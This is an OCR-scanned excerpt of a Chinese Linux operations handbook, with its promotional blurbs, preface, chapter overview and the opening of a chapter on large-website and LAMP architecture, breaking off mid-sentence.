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图 本 书 以 Red Hat Linux 发 行 版 为 基础 ， 在 讲 清楚 原理 的 前 提 
下 ， 通 过 大 量 实用 的 案例 ， 例 如 企业 网 站 架构 、LDAP 目 录 
服务 配置 、Oracle RAC 集 群 与 备份 、WebLogic 集 群 架设 、 
VMware 虚 拟 化 与 高 可 用 技术 、NetBackup 备 份 服务 器 架设 、 
MySQL 备 份 技巧 、 开 源 信息 安全 系统 OSSIM 的 详解 ， 以 及 
iptables 高 级 应 用 等 由 浅 入 深 地 介绍 给 读者 ， 这 种 以 Linux 案 
例 教学 模式 为 主 的 图 书 填补 了 国内 Linux 教 材 的 空白 。 


图 本 书 集成 了 作者 近 10 年 Linux 平 台 的 系统 运 维 经 验 ， 其 中 大 
量 研究 成 果 可 以 方便 地 应 用 到 企业 网 络 管理 和 运 维 当中 。 


图 本 书 不 但 注重 提炼 与 总 结 ， 而 且 详 细 记 录 了 操作 与 交互 过 程 ， 
方便 学 员 模 仿 学 习 ， 是 一 本 指导 Linux 系 统 工程 师 “ 怎 么 做 ” 
和 “做 什么 ”的 必 备 参考 书 。 
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内 容 简介 


全 书 共 14 章 ， 结 合 几 十 个 经 典 案例 ， 所 讲解 的 内 容 无 不 来 源 于 大 中 型 企业 生产 一 线 的 实践 性 总 结 。 其 中 
主要 介绍 了 Web 系统 集成 方法 、 漏 洞 测试 方法 和 LAMP 安全 配置 ; 配置 OpenLDAP 实现 Linux 下 的 应 用 统 


一 认证 ; 


配置 Postfix 大 型 邮件 系统 ，Oracle RAC 数据 库 集群 的 配置 与 管理 ， Heartbeat、WebLogic 和 OSCAR 


高 可 用 集群 的 搭建 , VSFTP 和 ProFTP 的 整合 管理 ，Snort 在 企业 中 的 部 署 与 管理 ; 配置 Xen 和 VMware 的 企 
业 虚 拟 化 应 用 ; Linux 系统 和 服务 的 安全 防护 策略 和 入 侵 案例 分 析 : Nagios 的 安装 和 高 级 配置 以 及 OSSIM 配 
置 和 综合 应 用 分 析 ; Linux 内 核 加 固 、iptables 防火 墙 在 企业 中 高 级 应 用 ;利用 Rsync 进行 数据 自动 化 备份 以 
及 NetBackup 安装 配置 与 Oracle 备份 实例 等 。 

本 书 适合 Linux 系统 管理 员 、 网 络 工程 师 、 系 统 集成 工程 师 使 用 ， 也 适合 作为 大 专 院 校 计算 机 专业 师 生 
的 参考 书 。 
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随 着 我 国信 息 化 的 深入 发 展 ， 基 于 Linux 特有 的 高 可 靠 性 、 高 稳定 性 和 高 安全 性 等 特点 ， 多数 
企业 已 将 Linux 操作 系统 从 原来 的 边缘 应 用 向 企业 关键 业务 应 用 转移 。 由 于 Linux 平台 几乎 拥有 所 
有 企业 信息 建设 需要 的 软件 , 能 够 轻松 且 廉 价 地 搭建 起 企业 应 用 服务 ， 因而 Linux 开始 蔡 代 商业 的 
UNIX 和 Windows 平台 ， 成 为 企业 建设 信息 化 的 重要 选择 。 另 外 出 于 建设 成 本 等 因素 考虑 ， 一 些 
机 构 也 将 UNIX 平台 的 高 端 应 用 向 基于 Linux 的 服务 器 平台 移植 。 目 前 ，Linux 操作 系统 已 成 为 仅 
次 于 Windows 的 操作 系统 。 

如 何 搭建 基于 Linux 服务 器 的 网 络 应 用 方案 ， 成 为 企业 网 络 管理 人 员 需 要 考虑 的 一 个 重要 问 
题 。 记得 我 的 一 位 中 学 数学 老师 在 回答 如 何 学 好 数学 时 说 过 的 一 句 话 ,“ 要 想 学 好 数学 就 要 多 做 题 ， 
做 题 时 公式 不 记得 就 查 书 ,不 怕 不 记得 公式 ,做 的 题目 多 了 自然 就 记 住 了 。” 在 创作 本 书 的 时 候 也 
是 以 “理论 够 用 、 实 践 第 一 ”为 原则 ， 也 就 是 先 做 题 后 讲 公 式 ， 这 样 通过 几 个 实验 下 来 ， 读 者 的 印 
象 也 会 十 分 深刻 。 全书 共 14 章 , 每 章 都 有 若干 个 经 典 案例 ， 每 个 案例 不 仅 对 事件 过 程 进行 了 讲解 ， 
对 一 些 重点 命令 和 知识 点 分 别 进行 了 深入 浅 出 地 讲解 。 这 种 写作 方式 既 不 流 俗 于 理论 讲解 , 也 不 局 
限于 命令 的 堆积 ， 采 用 基本 概念 和 实际 案例 的 操作 过 程 相 结合 ， 对 于 关键 环节 也 做 出 了 必要 说 明 ， 
可 以 照顾 到 一 些 Linux 基础 薄弱 的 读者 对 案例 的 学 习 和 消化 。 本 书 中 所 有 案例 都 经 上 机 实验 , 每 个 
案例 讲解 力求 通俗 易 懂 ,语言 曾 述 力求 深入 浅 出 ， 让 读者 通过 读 、 看 、 练 从 而 达到 具备 真正 的 动手 
能 力 。 本 书 第 1 版 上 市 仅 半年 后 登 上 了 当当 操作 系统 类 图 书 畅 销 榜 ， 在 当当 、 京 东 及 豆 辨 网 广 获 
IT 同行 们 肯定 ， 好 评 率 达到 98%。 


本 版 特色 


本 书 在 出 版 当年 就 获得 了 不 错 的 销量 ， 从 出 版 社 获悉 打算 再 次 出 版 ， 因 此 开始 对 第 1 版 做 出 
了 改版 计划 ， 对 第 1 版 内 容 进行 优化 组 合 ， 删 减 了 几 个 不 常用 案例 (包括 第 8 章 的 Wine 实战 之 
Linux 用 网 银 、 常 见 问 题 速 查 以 及 制作 自己 的 LiveCD 的 内 容 ) 。 新 增 了 140 页 的 内 容 ， 第 1 章 新 
增 了 构建 大 型 网 站 方法 、 基于 开源 WAF 的 使 用 方法 、Web 漏洞 扫描 工具 的 使 用 、 基于 PHP 的 SQL 
注入 防范 措施 、SQL 注入 漏洞 检测 方法 、Bind View 实现 网 通电 信 互 访 等 内 容 ; 第 2 章 新 增 了 利用 
LDAP 实现 Windows 和 Linux 平台 统一 认证 的 内 容 ; 第 3~5 章 修改 了 一 些 错别字 。 

第 6 章 增加 了 Vsftp 服务 器 配置 技巧 的 内 容 ; 第 7 章 增加 了 分 析 snort 规则 ， 以 及 服务 器 被 入 
侵 后 管理 员 最 应 做 的 5 件 事 ; 第 10 章 增 加 了 安装 远程 管理 工具 webmin 和 phpmyadmin， 为 ossim 
增加 gnome， 分 布 式 部 署 (vpn 连接 ) 、Ossim 插件 配置 管理 包括 如 何 创建 并 启用 新 插件 ， 收 集 防 
火 墙 日 志 的 方法 、 手 机 CheckPoint 日 志 的 方法 ， 收 集 squid 日 志 的 方法 ， 如 何 解 决 日 志 中 包含 中 文 
的 处 理 方法 ， 如 何 通 过 开源 软件 对 Ossim 进行 压力 测试 内 容 ; 第 11 章 增加 了 Iptables 过 滤 实 例 ， 
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包括 过 滤 网 站 过 滤 特 殊 字段 等 内 容 , 在 最 后 还 增加 了 13 章 内 核 安全 加 固 案 例 和 第 14 章 远程 连接 的 
数 个 经 典 案 例 。 

实验 平台 采用 Red Hat Enterprise Linux 和 SUSE Linux Enterprise 操作 系统 , 新 增 的 十 几 个 经 典 
案例 ， 对 企业 应 用 进行 分 析 和 重 现 。 在 本 书 的 写作 过 程 中 ， 作 者 花费 了 大 量 实践 在 实验 配置 上 , 目 
的 是 为 了 提高 可 操作 性 。 另 外 ,为 了 便于 读者 学 习作 者 录制 了 上 百 个 教学 视频 , 其 中 包括 轻松 学 习 
Linux 之 入 门 篇 系列 , Lamp, Lnmp, OracleRAC, KVM, RHCS, JBoss, Ha-Proxy, Hadoop, Weblogic, 
Openfiler，Postfix，Samba 配置 等 深 受 网 友 们 喜爱 的 内 容 ， 读 者 可 从 后 文中 的 交互 平台 下 载 学 习 。 


主要 章节 介绍 


全 书 共 分 14 章 ， 各 章 主 要 内 容 如 下 : 
第 1 章 Web 系统 集成 与 安全 


本 章 从 LAMP 网 站 基础 架构 讲 起 ， 包 括 大 型 网 站 架构 ， 详 细 分 析 了 LAMP 的 源码 安装 过 程 ， 

在 讲解 了 LAMP 架设 技巧 之 后 ， 紧 接着 介绍 利用 Nginx 在 服务 器 上 设置 缓存 ， 实 施 负 载 均衡 的 经 
典 案例 ， 其 中 还 介绍 了 6 点 Apache 安全 加 固 的 实用 方法 。 本 章 也 对 大 型 网 站 常见 的 数据 检索 缓慢 
的 情况 提出 了 新 的 解决 方案 ， 即 利用 Sphinx Search 提供 全 文 检 索 。 为 了 使 网 站 服务 器 能 更 好 地 处 
理 JSP 及 Servlet 程序 ， 本 章 详细 讲解 了 Apache 与 Tomcat 集成 的 步骤 ; 本章 的 后 半 部 分 ， 从 企业 
网 络 工程 师 和 骨干 运行 商 等 不 同 角度 详细 训 析 了 DDoS 的 检查 和 预防 措施 .本章 最 后 详细 分 析 了 企 
业 网 站 遭遇 DDoS 攻击 事件 的 过 程 , 并 根据 网 络 连接 状况 和 流量 的 统计 情况 , 提出 了 如 何 检测 网 站 
是 否 遭 受 DDoS 攻击 的 检测 方案 。 


第 2 章 目录 服务 配置 案例 


本 章 讲 解 了 如 何在 Linux 平台 上 通过 LDAP 服务 构建 统一 身份 认证 的 方法 ， 即 把 传统 的 网 络 
服务 , 例如 Web、FTP、SSH、E-mail、Samba 的 用 户 认证 都 由 LDAP 服务 器 负责 验证 ， 以 Red Hat 
Linux、SUSE Linux 为 例 详细 讲解 了 开源 软件 OpenLDAP 的 安装 、 账 户 管理 工具 的 配置 过 程 。 


第 3 章 基于 Postfix 的 大 型 邮件 系统 案例 


本 章 介 绍 了 目前 流行 的 邮件 服务 器 Postfix 的 安装 配置 与 管理 过 程 。 从 邮件 基本 配置 讲 起 ， 一 
直 深入 到 Postfix 反 垃圾 邮件 配置 、 反 病毒 配置 、 安 全 加 密 配置 及 其 邮件 系统 的 自动 监控 配置 过 程 ， 
最 后 还 分 析 了 网 易 、 新 浪 等 分 布 式 大 型 邮件 系统 的 架构 设计 。 


第 4 章 Oracle RAC 数据 库 集群 在 Linux 系统 下 搭建 案例 


本 章 通过 数据 系统 中 心 升级 的 实际 案例 ， 配 合 清晰 的 安装 流程 图 ， 详 细 讲 解 了 从 Oracle 安装 
准备 、 环境 调整 到 配置 共享 存储 设备 , 创建 和 配置 raw 设备 , 再 讲 到 Oracle 安装 和 配置 Oracle Net， 
创建 与 管理 维护 RAC 数据 库 ， 以 及 ASM 的 操作 注意 事项 。 对 于 其 中 不 少 枯燥 的 理论 术语 ， 进 行 
了 简单 明了 地 讲解 。 


第 5 章 企业 集群 案例 分 析 


本 章 通过 开源 软件 Heartbeat、OSCAR 所 这 涉及 的 HA 高 可 用 集群 的 搭建 过 程 ， 通 过 Mon 软 
件 实现 网 络 和 服务 的 监控 ， 并 讲解 了 集群 搭建 完毕 的 测试 技术 ， 在 第 4 章 Oracle RAC 设置 的 基础 
上 ， 循 序 渐进 地 通过 实际 案例 详细 讲解 了 证 券 交 易 系 统 WebLogic 集群 的 搭建 过 程 。 


第 6 章 FTP 服务 器 的 安全 配置 案例 


本 章 介绍 了 高 级 FTP 集成 应 用 的 综合 案例 , 通过 VSFTPD 和 ProFTPD 用 户 集中 管理 ,详细 介 
绍 了 MySQL 和 ProFTP、VSFTP 完美 结合 的 问题 ， 通 过 两 者 的 融合 可 以 搭建 一 个 高 效 、 稳 定量 集 
中 管理 的 FTP 服务 器 。 通 过 实际 案例 讲解 了 VSFTP 的 安全 设置 ， 且 对 于 如 何 预防 暴力 破解 FTP 
服务 器 技术 做 了 深入 探讨 。 


第 7 章 部 署 IDS 案例 分 析 


本 章 通过 源码 包 讲解 如 何在 企业 内 部 网 中 部 署 Snort， 面 对 千 光 企业 环境 下 如 何 解决 IDS 所 带 
来 的 瓶颈 问题 ， 其 中 涉及 了 交换 机 的 端口 镜像 SPAN 和 多 网 卡 的 绑 定 等 重点 问题 ， 并 讲解 了 如 何 
通过 网 络 数据 流量 来 创建 新 的 Snort 规则 。 同 时 也 通过 Snort Center 的 安装 讲解 如 何 管理 Snort， 当 
然 Snort 应 用 也 不 会 是 一 帆 风 顺 的 ， 笔 者 通过 一 个 亲身 经 历 的 案例 ， 根 据 案情 描述 和 取证 信息 详细 
讲解 了 互联 网 黑客 利用 他 碎片 绕 过 Snort 攻击 企业 服务 器 的 案例 。 


第 8 章 虚拟 化 技术 应 用 案例 

本 章 首 先 对 Linux 系统 中 运行 Windows 程序 的 一 种 实现 一 一 Wine 内 核 运行 的 机 理 和 实例 进行 
了 详细 地 分 析 ， 从 而 打下 了 虚拟 化 技术 的 基础 ， 之 后 以 SUSE Linux 企业 版 为 基础 平台 ， 详 细 讲 解 
了 Xen 虚拟 化 技术 的 应 用 特点 和 使 用 方法 ， 其 中 还 对 Xen 控制 虚拟 主机 的 常用 命令 、 故 障 处 理 技 
巧 进行 了 详细 叙述 。 在 本 章 的 最 后 ， 还 和 大 家 一 起 分 享 了 VMware HA 构建 高 可 用 集群 案例 的 实施 
心得 。 

第 9 章 Linux 性 能 优化 


本 章 针 对 导致 系统 性 能 瓶颈 的 几 个 方面 : CPU、 内 存 、 磁 盘 IO、 网 络 子 系统 进行 分 析 ， 介 绍 
了 常用 的 检测 工具 : top、vmstat、iostat、netstat 等 ， 最 后 重点 从 几 个 方面 详细 介绍 了 Oracle 数据 
库 性 能 优化 的 问题 ， 以 及 LAMP 网 站 优化 问题 。 


第 10 章 主机 监控 应 用 案例 


本 章 首 先 讲解 运用 Linux 下 的 开源 软件 Nagios 结合 NRPE 插件 ， 实 现 各 种 网 络 服务 监控 配 
置 及 利用 飞信 实现 Nagios 短信 报警 功能 。 其 次 讲解 了 Ntop 监控 和 分 析 网 络 流量 ， 并 介绍 了 扩展 
的 几 个 高 级 应 用 例如 与 Google Map 整合 实现 标注 监控 IP 位 置 的 功能 、 对 PDA 手持 设备 的 支持 、 
NetFlow 功能 的 实现 分 别 做 了 详细 讲解 ， 最 后 通过 调整 内 核 来 提升 Ntop 的 性 能 。 第 5 章 已 讲解 
过 Mon 对 集群 的 监控 ， 这 里 将 介绍 开源 的 集群 监控 工具 Ganglia， 实 现 对 整个 集群 节点 的 全 面 监 
控 ， 并 对 数据 进行 综合 分 析 和 对 处 理 结 果 进 行 相应 决策 。 接 下 来 本 章 详 细 介 绍 了 用 cheops-ng 来 
管理 网 络 设备 ; 最 后 重点 介绍 了 一 个 信息 安全 监控 软件 OSSIM, 它 将 前 面 介绍 过 的 Nagios、 Ntop、 
Cheops、Snort、Nmap 这 些 工具 监控 的 功能 集成 在 一 起 提供 综合 的 安全 保护 平台 ， 使 用 户 得 到 一 
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站 式 的 服务 。 文 中 详细 分 析 了 OSSIM 提供 的 功能 和 流程 ， 然 后 对 其 安装 部 署 、 系 统 配置 和 主要 
功能 的 使 用 都 做 了 详细 地 描述 ， 并 提供 了 与 Cacti、Zabbix 监控 软件 的 系统 集成 。 
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本 章 深 入 系统 内 核 详 细 讲 解 了 调整 netfilter 内 核 模块 以 限制 P2P 连接 、 限 制 BT 下 载 、 预 防 Syn 
Flood 攻击 的 方法 ， 并 通过 来 自生 产 一 线 的 实用 脚本 分 析 了 基于 iptables 的 Web 认证 的 实现 过 程 ， 
iptables 过 滤 实 例 ， 包 括 过 滤 网 站 过 滤 特 殊 字段 等 。 


第 12 章 数据 备份 与 恢复 


本 章 从 备份 的 基础 讲 起 ， 首 先 提供 了 运用 SSH、Rsync 实现 数据 自动 备份 的 案例 ， 然 后 又 向 读 
者 介绍 了 运用 日 志 进行 MySQL 数据 库 实时 恢复 的 案例 ， 最 后 花费 大 量 篇 幅 重点 讲解 NetBackup 
安装 、 配 置 及 管理 和 进行 Oracle 数据 库 备 份 和 恢复 的 案例 ， 每 个 案例 都 采用 概念 和 实例 相 结合 
方式 ， 通 俗 易 懂 。 

第 13 章 内 核 安全 加 固 案例 


本 章 以 Linux 内 核 安 全 的 为 背景 ， 着 重 介绍 用 VXE (虚拟 执行 环境 ) 技术 来 保护 Linux 安全 ， 
它 相当 于 一 个 IPS， 通 过 对 进行 配置 来 保护 Linux 系统 ， 接 下 来 从 系统 缓冲 区 溢出 原理 将 其 逐步 分 
析 产 生 原 因 和 利用 DSM 防范 的 技巧 。 


第 14 章 远程 连接 

从 基础 的 使 用 Linux 远程 桌面 设置 讲 起 ， 逐 步 介绍 到 XDM 的 配置 ， 再 介绍 常用 的 VNC 服务 
的 攻击 预防 案例 分 析 , 接着 介绍 了 加 固 SSH 服务 器 的 九 种 方法 , 最 后 讲解 SSH/RDP 等 远程 访问 方 
式 的 审计 方法 。 
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第 1 章 Web 系统 集成 与 安全 


1.1 构建 大 型 网 站 


一 个 小 型 的 网 站 ， 使 用 最 简单 的 HTML 静态 页 面 就 可 以 实现 ， 配 合 一 些 JavaScript 脚本 、 
图 片 或 Flash 达到 美化 效果 (HTML 5 也 不 错 ) ， 所 有 的 页 面 均 存 放 在 一 个 目录 下 ， 这 样 的 网 
站 对 系统 架构 、 性 能 的 要 求 都 很 简单 ， 可 是 网 站 技术 经 过 这 些 年 的 发 展 ， 已 经 分 得 非常 细致 ， 
尤其 对 于 大 型 网 站 来 说 ， 所 采用 的 技术 涉及 面 更 是 非常 广泛 ， 从 硬件 到 软件 、 编 程 语言 、 数 据 
库 、Web Server、 防 火 墙 等 各 个 领域 都 有 很 高 的 要 求 。 

类 似 网 易 、 搜 狐 这 样 的 大 型 门户 网 站 。 在 面 对 大 量 用 户 访问 、 高 并 发 请 求 方面 ， 基 本 的 解决 
方案 集中 在 这 样 几 个 环节 : 使 用 高 性 能 的 服务 器 、 高 性 能 的 数据 库 、 高 效率 的 编程 语言 、 还 有 高 
性 能 的 Web 容器 。 但 是 除了 这 几 个 方面 ， 还 是 无 法 从 根本 上 解决 网 站 高 负载 和 高 并 发 问题 。 

下 面 我 们 从 低 成 本 、 高 性 能 和 高 可 扩展 性 的 角度 来 谈 一 下 网 站 优化 的 几 个 方面 。 


1. HTML 静态 化 


我 们 知道 效率 最 高 、 消 耗资 源 最 小 、 最 容易 被 搜索 引擎 收录 的 就 是 静态 HTML 页 面 ， 所 
以 我 们 尽 可 能 在 网 站 上 采用 静态 页 面 , 这 个 最 简单 的 方法 其 实 也 是 最 有 效 的 方法 。 但 是 对 于 拥 
有 大 量 内容 并 且 频 繁 更 新 的 网 站 , 我 们 无 法 全 部 手动 去 挨个 实现 , 于 是 出 现 了 常见 的 信息 发 布 
系统 CMS， 例 如 可 以 免费 下 载 的 DEDECMS、PHPCMS、 帝 国 CMS 等 网 站 。 再 比如 我 们 常 访 
问 的 各 个 门户 站 点 的 新 闻 频 道 , 都 是 通过 信息 发 布 系统 来 管理 和 实现 的 , 信息 发 布 系统 可 以 实 
现 的 最 简单 的 信息 录入 自动 生成 静态 页 面 ， 还 能 具备 频道 管理 、 权 限 管 理 、 自 动 抓 取 等 功能 ， 
对 于 一 个 大 型 网 站 来 说 ， 拥 有 一 套 高 效 、 可 管理 的 CMS 是 必 不 可 少 的 。 


2. 图 片 服务 器 分 离 


对 于 Web 服务 器 来 说 ， 不 管 是 Apache、IIS 还 是 其 他 容器 ， 图 片 是 比较 消耗 资源 的 ， 所 
以 考虑 将 图 片 与 HTML 页 面 进行 分 离 ， 这 也 是 目前 市 面 上 大 型 网 站 都 采用 的 策略 ， 他 们 都 配 
有 独立 的 图 片 服 务 器 ， 甚 至 很 多 台 图 片 服务 器 。 图 片 分 离 到 独立 服务 器 上 以 后 ,可 以 降低 提供 
页 面 访问 请 求 的 服务 器 系统 压力 ， 并 且 可 以 保证 系统 不 会 因为 图 片 问题 而 崩溃 ， 比 如 Apache 
在 配置 ContentType 的 时 候 ， 可 以 配置 尽 可 能 少 的 LoadModule， 以 保证 系统 消耗 更 低 和 执行 
效率 更 高 。 
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3. 数据 库 集群 


大 型 网 站 都 用 到 数据 库 技术 , 那么 在 面 对 大 量 频繁 访问 的 时 候 , 数据 库 的 瓶颈 很 快 就 会 显 
现 出 来 , 一 台数 据 库 很 显然 无 法 满足 高 并 发 的 需要 ,于 是 可 以 使 用 数据 库 集群 技术 。 在 数据 库 
集群 方面 ， 很 多 数据 库 都 有 自己 的 解决 方案 ，Oracle、MySQL 都 有 很 好 的 解决 方案 ， 常 用 的 
MySQL 提供 的 主 /从 复制 、Replication 或 者 应 用 自身 的 处 理 ， 可 以 很 好 地 保证 容错 (允许 部 分 
节点 失效 ) 、 应 用 的 健壮 性 和 可 靠 性 。 


4. 缓存 技术 


在 计算 机 系统 中 很 多 地 方 都 要 用 到 缓存 ， 例 如 主板 、CPU、 显 卡 、 网 卡 等 等 ， 这 些 地 方 都 
用 到 缓存 。 在 大 型 网 站 架构 中 缓存 也 非常 重要 。 从 架构 方面 的 看 ，Apache 提供 了 自己 的 缓存 
模块 ， 例 如 在 前 端的 基于 静态 页 面 缓存 的 Web 加 速 器 ， 主 要 应 用 有 Squid 等 。Squid 能 将 大 
部 分 静态 资源 (图片 JS、CSS 脚本 ) 缓存 起 来 ， 直 接 返 回 给 访问 者 ， 减 少 应 用 服务 器 的 负载 。 
这 两 种 方式 均 可 以 有 效 地 提高 Apache 的 访问 响应 能 力 。 从 程序 开发 角度 来 看 ，Linux 上 提供 
的 Memory Cache 是 常用 的 缓存 接口 ， 可 以 在 Web 开发 中 使 用 ， 比 如 使 用 Java 开发 的 时 候 ， 
就 可 以 调用 Memory Cache 对 一 些 数据 进行 缓存 和 通信 共享 ， 很 多 大 型 社区 使 用 了 这 个 技术 。 


5. 负载 均衡 


负载 均衡 是 大 型 网 站 解决 高 负荷 访问 和 大 量 并 发 请 求 的 一 个 很 不 错 的 解决 办 法 。 负 载 均 衡 
技术 发 展 了 多 年 ,， 有 很 多 专业 的 服务 提供 商 和 产品 可 以 选择 ， 例 如 硬件 四 层 交 换 ,， 它 使 用 第 三 
层 和 第 四 层 信息 包 的 报头 信息 , 根据 应 用 区 间 识 别 业务 流 , 将 整个 区 间 段 的 业务 流 分 配 到 合适 
的 应 用 服务 器 进行 处 理 。 第 四 层 交 换 功能 就 像 是 虚 IP， 指 向 物理 服务 器 。 它 传输 的 业务 服从 
的 协议 多 种 多 样 ， 有 HTTP、FTP、NFS、Telnet 或 其 他 协议 。 这 些 业务 在 物理 服务 器 基础 上 ， 
需要 复杂 的 载 量 平衡 算法 。 在 硬件 四 层 交 换 产 品 领域 ， 有 一 些 知名 的 产品 可 以 选择 ， 比 如 F5 
等 ， 这 种 产品 很 昂贵 ， 能 够 提供 非常 优秀 的 性 能 和 很 灵活 的 管理 能 力 。 

另外 一 种 方法 就 是 软件 四 层 交 换 ， 可 以 使 用 Linux 上 常用 的 LVS 等 很 多 的 开源 软件 来 解 
决 。LVS 就 是 Linux Virtual Server， 它 提供 了 基于 心跳 线 heartbeat 的 实时 灾难 应 对 解决 方案 ， 
提高 系统 的 鲁 棒 性 ， 同 时 提供 了 灵活 的 虚拟 VIP 配置 和 管理 功能 ， 可 以 同时 满足 多 种 应 用 需 
求 ， 这 对 于 分 布 式 的 系统 来 说 必 不 可 少 。 


6. 程序 和 数据 库 的 系统 优化 


一 个 好 的 程序 员 写 出 来 的 程序 会 非常 简洁 、 性 能 很 好 , 一 个 初级 程序 员 可 能 会 犯 很 多 低级 
错误 ， 这 也 是 影响 网 站 性 能 的 原因 之 一 。 网 站 要 做 到 效率 高 ， 不 光 是 程序 员 的 事情 ， 数 据 库 优 
化 、 程 序 优化 也 是 必须 的 , 在 性 能 优化 上 要 数据 库 和 程序 齐头并进 ! 缓存 也 是 两 方面 同时 入 手 。 
第 一 ， 数 据 库 缓 存 和 数据 库 优 化 ， 这 个 由 DBA 完成 〈 而 且 这 个 有 非常 大 的 潜力 可 挖 ， 只 是 大 
部 分 程序 员 都 忽略 了 而 已 ) 。 第 二 ， 程 序 上 的 优化 ， 这 个 非常 有 讲究 ， 比 如 说 重要 一 点 就 是 要 
规范 SQL 语句 ， 少 用 in 多 用 or， 多 用 preparestatement 存储 过 程 ， 另 外 避免 程序 元 余 ， 如 查 
找 数据 时 少 用 双重 循环 等 。 
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要 架构 一 个 大 型 网 站 ， 就 会 用 到 上 面 的 一 种 或 多 种 技术 ， 上 面 的 介绍 比较 简单 ， 只 是 给 大 
家 在 实现 过 程 中 提供 一 个 解决 遇 到 问题 的 线索 ， 需 要 大 家 慢 慢 熟悉 和 理解 。 


1.2 LAMP 网 站 架构 方案 分 析 


LAMP (Linux-Apache-MySQL-PHP) 网 站 架构 是 目前 国际 流行 的 Web 框架 , 该 框架 包括 : 
Linux 操作 系统 ，Apache 网 络 服务 器 ，MySQL 数据 库 ，Perl、PHP 语言 ， 所 有 组 成 产品 均 是 
开源 软件 ， 是 国际 上 成 熟 的 架构 框架 ， 很 多 流行 的 商业 应 用 都 采用 这 个 架构 ， 与 Java/J2EE 架 
构 相 比 , LAMP 具有 Web 资源 丰富 、 轻 量 、 快速 开发 等 特点 , 与 微软 的 .NET 架构 相 比 , LAMP 
具有 通用 、 跨 平台 、 高 性 能 、 低 价格 的 优势 ， 因 此 LAMP 无 论 是 性 能 、 质 量 还 是 价格 都 是 企 
业 搭 建 网 站 的 首选 平台 ，LAMP 网 站 优化 架构 如 图 1.1 所 示 。 


Nginx Server 


Apache Server 


图 1.1 LAMP 网 站 优化 架构 


对 于 大 流量 、 大 并 发 量 的 网 站 系统 架构 来 说 , 除了 硬件 上 使 用 高 性 能 的 服务 器 、 负载 均衡 、 
CDN 等 之 外 ， 在 软件 架构 上 需要 重点 关注 以 下 几 个 环节 : 使 用 高 性 能 的 操作 系统 (OS) 、 高 
性 能 的 网 页 服务 器 (Web Server) 、 高 性 能 的 数据 库 〈Database) 、 高 效率 的 编程 语言 等 。 下 
面 将 从 这 几 点 对 其 进行 讨论 。 


1.2.1 操作 系统 的 选择 


Linux 操作 系统 有 很 多 不 同 的 发 行 版 本 ， 如 Red Hat Enterprise Linux、SUSE Linux 
Enterprice、Debian、Ubuntu、CentOS 等 ， 每 一 个 发 行 版 本 都 有 自己 的 特色 ， 比 如 RHEL 的 稳 
定 、Ubuntu 的 易 用 ， 基 于 稳定 性 和 性 能 的 考虑 ， 企 业 版 操作 系统 建议 选择 正版 的 (包括 购买 
服务 ) Red Hat 或 SUSE 的 企业 版 。 因 为 一 旦 在 部 署 或 运 维 过 程 中 出 现 故 障 或 问题 会 有 厂家 的 
工程 师 提供 支持 。 

若 出 于 节省 成 本 方面 的 考虑 想 使 用 免费 的 操作 系统 ， 建 议 选 用 CentOS ，CentOS 
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(Community Enterprise Operating System) 是 Linux 发 行 版 之 一 ， 是 RHEL/Red Hat Enterprise 
Linux 的 精简 免费 版 ， 和 RHEL 的 源 代码 相同 ， 不 过 ，RHEL 和 SUSE LE 等 企业 版 提供 的 升 
级 服务 均 是 收费 的 ， 因 此 要 求 免费 的 、 高 度 稳定 性 的 服务 器 可 以 用 CentOS 蔡 代 Red Hat 
Enterprise Linux 使 用 。 


1.2.2 ”Web 服务 器 、 缓 存 和 PHP 加 速 


Apache 是 LAMP 架构 最 核心 的 Web Server， 开 源 、 稳 定 、 模 块 丰富 是 Apache 的 优势 。 
但 Apache 的 缺点 是 有 些 腔 肿 ， 内 存 和 CPU 开销 大 ， 人 性 能 上 有 损耗 ， 不 如 一 些 轻 量 级 的 Web 
服务 器 (例如 Nginx ) 高 效 , 轻 量 级 的 Web 服务 器 对 于 静态 文件 的 响应 能 力 来 说 远 高 于 Apache 
服务 器 。 

Apache 作为 Web Server 是 负载 PHP 的 最 佳 选择 , 如 果 流 量 很 大 的 话 , 可 以 采用 Nginx 
来 负载 非 PHP 的 Web 请 求 。Nginx 是 一 个 高 性 能 的 HTTP 和 反 向 代理 服务 器 ，Nginx 以 它 
的 稳定 性 、 丰 富 的 功能 集 、 示 例 配置 文件 和 低 系 统 资源 的 消耗 而 闻名 。Nginx 不 支持 PHP 
和 CGI 等 动态 语言 ， 但 支持 负载 均衡 和 容错 ， 可 与 Apache 配合 使 用 ， 是 轻 量 级 的 HTTP 
服务 器 的 首选 。 

Web 服务 器 的 缓存 有 多 种 方案 , Apache 提供 了 自己 的 缓存 模块 , 也 可 以 使 用 外 加 的 Squid 
模块 进行 缓存 ， 这 两 种 方式 均 可 以 有 效 地 提高 Apache 的 访问 响应 能 力 。Squid Cache 是 一 个 
Web 缓存 服务 器 ， 支 持 高 效 的 缓存 ， 可 以 作为 网 页 服务 器 的 前 置 Cache 服务 器 缓存 相关 请 求 
来 提高 Web 服务 器 的 速度 ,把 Squid 放 在 Apache 的 前 端 来 缓存 Web 服务 器 生成 的 动态 内 容 ， 
而 Web 应 用 程序 只 需要 适当 地 设置 页 面 实效 时 间 即 可 , 如 访问 量 巨大 则 可 考虑 使 用 Memcache 
作为 分 布 式 缓存 。 

PHP 的 加 速 可 使 用 eAccelerator 加 速 器 ，eAccelerator 是 一 个 自由 开放 源码 PHP 加 速 器 ， 
优化 和 动态 内 容 缓存 提高 了 性 能 PHP 脚本 的 缓存 性 能 ， 使 得 PHP 脚本 在 编译 的 状态 下 ， 对 服 
务 器 的 开销 几乎 完全 消除 。 它 还 对 脚本 起 优化 作用 ， 以 加 快 其 执行 效率 ， 使 PHP 程序 代码 的 
执行 效率 提高 1~10 倍 。 

具体 的 解决 方案 有 以 下 几 种 : 


(1) Squid + Apache + PHP + eAccelerator 
使 用 Apache 负载 PHP， 使 用 Squid 进行 缓存 ，HTML 或 图 片 的 请 求 可 以 直接 由 Squid 返 
给 用 户 ， 很 多 大 型 网 站 都 采用 这 种 架构 。 


(2) Nginx/Apache + PHP (FastCGI) +eAccelerator 
使 用 Nginx 或 Apache 负载 PHP，PHP 使 用 FastCGI 方式 运行 ， 效 率 较 高 。 


Ee] 


(3) Nginx + Apache + PHP + eAccelerator 
此 方案 综合 了 Nginx 和 Apache 的 优点 , 使 用 Apache 负载 PHP, Nginx 负责 解析 其 他 Web 
请 求 ， 使 用 Nginx 的 Rewrite 模块 ，Apache 端口 不 对 外 开放 。 
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1.2.3 数据库 


在 开源 的 数据 库 中 ，MySQL 在 性 能 、 稳 定性 和 功能 上 是 首选 ， 虽 被 收购 但 性 能 上 却 一 点 
